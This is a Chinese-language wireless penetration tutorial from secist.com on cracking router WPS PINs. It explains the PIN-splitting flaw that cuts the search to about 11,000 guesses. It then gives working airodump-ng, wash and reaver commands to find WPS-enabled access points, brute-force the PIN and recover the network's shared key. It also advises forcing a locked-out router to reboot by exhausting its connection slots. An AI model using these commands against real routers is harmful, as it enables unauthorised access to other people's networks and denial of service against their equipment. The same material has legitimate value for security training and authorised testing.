WPS原本是为了使用的安全和方便而设计的,但是却被安全专家爆出存在可被利用的缺陷。即接入方可以通过返回值来判断 pin 码前四位的正确与否,而后四位的最后一位是 checksum 。由于其本身的八位 PIN码分为两段,因此我们只要理论尝试11000次就可以轻松破解出 PIN 码,从而进一步获取到 PSK 。
同样将网卡置入为侦听模式,这里不多说了。下面我们来查查附近有无支持WPS的路由器。
airodump-ng waln0mon –wps
我们还可以使用如下命令进行WPS的侦测。
wash -C -i wlan0mon
从结果我们可以看到,目前有三个AP都支持WPS。
接着我们就可以使用 reaver 来进行PIN码的爆破了。
reaver -i wlan0mon -b 14xxxxxxxxx56 -vv -c 11
当我们成功获取PIN码后,我们就可以使用如下命令来进行PSK共享秘钥的破解了!
reaver -i wlan0mon -b 14xxxxxxxxx56 -vv -c 11 -p 88888888
注意:在以上操作很有可能触发实现锁定机制的路由器。一旦锁定,我们将无法进行破解!一旦触发锁定,我们可以耗尽AP连接数,使其重启,从而解开锁定!
原创文章,转载请注明来源!即刻安全(secist.com)
文章地址:http://www.secist.com/?p=115&preview=true
转载请注明:即刻安全 » (七)无线渗透之WPS破解